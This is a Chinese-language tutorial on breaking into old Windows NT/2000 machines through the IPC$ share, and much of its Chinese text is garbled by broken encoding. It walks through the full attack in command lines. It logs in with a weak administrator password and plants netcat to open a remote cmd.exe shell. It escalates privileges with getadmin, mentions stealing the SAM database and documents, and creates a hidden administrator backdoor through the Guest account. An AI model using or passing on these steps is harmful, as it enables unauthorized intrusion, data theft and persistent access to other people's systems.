IPC入侵攻略！其實(shí)針對(duì)IPC漏洞入侵的方法目前已經(jīng)有很多的教程，但是其中很多教程并不完整，所以還是有很多網(wǎng)友來信問我關(guān)于IPC漏洞入侵的有關(guān)問題，這就是我寫這篇文章的原因了。如果你覺得本文也不完整，那只好去找更好的版本了，但是我希望你能把你的意見和建議告訴我，讓我不斷的完善這篇文章。本文參考了小榕的流光2000說明文檔及其它相關(guān)文檔，也包含了一些自己的心得體會(huì)。本文歡迎非商業(yè)性轉(zhuǎn)載，但請保持文章完整性并注明出處�。�-）

IPC是Internet Process Connection的縮寫，也就是遠(yuǎn)程網(wǎng)絡(luò)連接。它是Windows NT及Windows 2000特有的一項(xiàng)功能，特點(diǎn)是在同一時(shí)間內(nèi)，兩個(gè)IP之間只允許建立一個(gè)連接。好了，廢話少說，現(xiàn)在進(jìn)入主題。

如何找到具有IPC漏洞的主機(jī)呢？以前我都是組合一個(gè)國外的掃描工具（名字我忘了）和KillUSA的LetMeIn，因?yàn)楹芏喙ぷ鞫际鞘止ね瓿傻�，所以速度可想而知了�，F(xiàn)在因?yàn)橛辛诵￠诺牧鞴?000，所以找到這樣的主機(jī)實(shí)在是太簡單了，具體操作我就不說了，大家可以參考該軟件的說明文檔。

好了，假設(shè)我們已經(jīng)找到了一臺(tái)這樣的主機(jī)，地址是139.223.200.xxx，管理員帳號(hào)是Administrator，密碼是123456。進(jìn)入命令行方式，正式開工。需要說明的是，以下操作都是在目標(biāo)主機(jī)沒有禁止遠(yuǎn)程IPC$連接和啟動(dòng)Schedule服務(wù)的理想情況下進(jìn)行的。

F:\》net use \\139.223.200.xxx\ipc$ "123456" /user:"Administrator"
命令成功完成。

F:\》copy nc.exe \\139.223.200.xxx\admin$
已復(fù)制 1 個(gè)文件。

F:\》net time \\139.223.200.xxx
\\139.223.200.xxx 的當(dāng)前時(shí)間是 2010/06/25 上午 10:25
在 \\139.223.200.xxx 的本地時(shí)間 (GMT - 07:00) 是 2010/06/25 上午10:35
命令成功完成。

F:\》at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe
新增加了一項(xiàng)作業(yè)，其作業(yè) ID = 0

F:\》telnet 139.223.200.xxx 1234

上面的命令很簡單，你只要參考一下net，at和nc的用法就可以了。這樣，我們就登上了遠(yuǎn)程的主機(jī)。最理想的情況是這樣的，但是，也許你會(huì)遇到目標(biāo)主機(jī)的Schedule服務(wù)沒有啟動(dòng)的情況，那么，at命令就不能用了，我們就需要增加以下步驟。

F:\》at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe
服務(wù)仍未啟動(dòng)。

F:\》netsvc \\139.223.200.xxx schedule /start
Service is running on \\139.223.200.xxx

登上遠(yuǎn)程主機(jī)之后，我們可以做什么呢？這要視這個(gè)帳號(hào)的權(quán)限以及該主機(jī)的安全策略來決定。如果你的權(quán)限不夠的話，可以試試下面的步驟。首先在本地執(zhí)行下面的命令。

F:\》copy getadmin.exe \\139.223.200.xxx\admin$
已復(fù)制 1 個(gè)文件。

F:\》copy gasys.dll \\139.223.200.xxx\admin$
已復(fù)制 1 個(gè)文件。

其次，在遠(yuǎn)程主機(jī)運(yùn)行下面的命令。

C:\WINNT\system32》getadmin

如果成功的話，你就是這臺(tái)主機(jī)的管理員了，權(quán)限夠大了吧？：-）

那么，現(xiàn)在我們能做什么呢？改主頁？下載SAM數(shù)據(jù)庫？都可以啦！方法有很多，我就不一一說了，具體方法可以參考相關(guān)教程。我一般對(duì)目標(biāo)主機(jī)上的WORD文檔和數(shù)據(jù)庫比較感興趣，呵呵。。。

其實(shí)，如果你在這臺(tái)機(jī)子上面放個(gè)木馬或者病毒什么的東東，做起事來更容易一些，但是我覺得如果你跟他沒什么深仇大恨的話，還是不要這么做了，這樣不好。

作完了你要做的事，不要忘了做個(gè)后門。

C:\WINNT\system32》net user Guest 30906766
net use Guest 30906766
The command completed successfully.

C:\WINNT\system32》net localgroup administrators Guest /add
net localgroup administrators Guest /add
The command completed successfully.

這是個(gè)比較簡單的后門，要想做的更好一些，可以象Linux那樣，做出一套R(shí)ootKits來，其實(shí)這樣的東東目前已經(jīng)有了，你只要拿來用就可以了。現(xiàn)在搞破壞真是簡單多了，那么多的傻瓜工具任你用，哎！要想自保，不學(xué)點(diǎn)安全知識(shí)怎么行呢？